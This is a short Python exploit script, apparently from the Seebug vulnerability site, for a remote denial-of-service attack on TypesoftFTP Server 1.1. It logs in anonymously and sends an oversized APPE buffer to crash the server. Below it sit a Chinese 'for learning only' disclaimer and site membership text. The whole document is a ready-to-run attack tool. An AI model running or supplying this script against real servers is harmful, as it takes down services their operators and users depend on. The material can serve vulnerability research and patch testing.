#!/usr/bin/python import socket, sys if len(sys.argv)!= 2: print '\n\t[*] Usage: ./' + sys.argv[0] + ' <target host>' sys.exit(1) print '\n\t[*] TypesoftFTP Server 1.1 Remote DoS (APPE) by Brock Haun' host = sys.argv[1] s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = 'A../' + '\x41' *100 print '\n\t[*] Sending crash buffer ("A../ + \x41 * 100").' s.connect((host,21)) data = s.recv(1024) s.send('USER anonymous' + '\r\n') data = s.recv(1024) s.send('PASS anonymous' + '\r\n') data = s.recv(1024) s.send('APPE ' + buffer + '\r\n') print '\n\t[*] Done! Target should be unresponsive!' s.close()
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论